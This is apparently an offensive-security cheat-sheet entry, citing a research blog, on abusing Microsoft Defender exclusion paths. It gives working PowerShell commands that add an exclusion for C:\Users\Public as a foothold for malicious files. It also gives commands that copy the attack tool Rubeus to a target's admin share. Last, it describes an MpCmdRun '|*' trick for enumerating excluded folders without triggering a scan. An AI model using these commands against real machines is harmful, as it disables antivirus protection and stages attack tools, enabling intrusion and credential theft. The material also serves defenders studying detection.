ExclusionPath on Defender (Require local Administrator)It is possible to define an exclusion path on the Defender so as to make that path a good foothold for any malicious files to be uploaded to the target machine:
Get-MpPreference | select ExclusionPath
Set-MpPreference -ExclusionPath "C:\\Users\\Public"
Now map drive, copy tools and unmap drive:
net use x: \\\\<target>\\c$
echo F | xcopy.exe C:\\Tools\\Rubeus.exe x:\\Users\\Public\\
net use x: /D
& "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\\folder_to_check\\|*"
If the folder is excluded, the output will read “Scanning C:\folder_to_check\| was skipped.”*.
Successful enumeration of an excluded folder
If the folder is not excluded, the system will return an error message stating “CmdTool: Failed with hr = 0x80508023. Check C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\MpCmdRun.log for more information” because of the invalid path created by the use of the “|*” syntax.
Scanning a folder that is not excluded yields an error
This method is effective because Microsoft Defender checks for exclusions before scanning files in the folder (which is beneficial for tools that need to run repeatedly without actually scanning files).
By utilizing the “|” approach, Defender first verifies if the directory is on the exclusion list, since “|*” is not a valid file or folder name (and therefore avoids a file scan even if the folder is not excluded).
https://blog.fndsec.net/2024/10/04/uncovering-exclusion-paths-in-microsoft-defender-a-security-research-insight/